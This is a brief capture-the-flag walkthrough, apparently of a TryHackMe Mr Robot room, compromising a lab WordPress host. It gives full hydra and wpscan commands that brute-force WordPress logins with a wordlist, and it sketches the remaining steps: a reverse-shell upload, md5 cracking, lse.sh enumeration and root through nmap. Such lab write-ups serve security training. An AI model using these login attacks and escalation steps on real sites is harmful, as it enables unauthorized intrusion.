nmap
Closed but it’s ok, THM take lot of time to load
Gobuster
wordpress login
http://10.10.185.72/wp-login.php
robots.txt
So…
Wordpress
Find the user
hydra -L fsocity.dic -p admin 10.10.185.72 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.185.72%2Fwp-admin%2F&testcookie=1:F=Invalid username."
Find the password
wpscan -v -U user.txt -P fsocity.dic.sort --url http://10.10.185.72/wp-login.php
Revershell
zip it, send it, listen and activate.
Robot
md5
root
lse.sh
lse.sh is in my current directory.
/usr/local/bin/nmap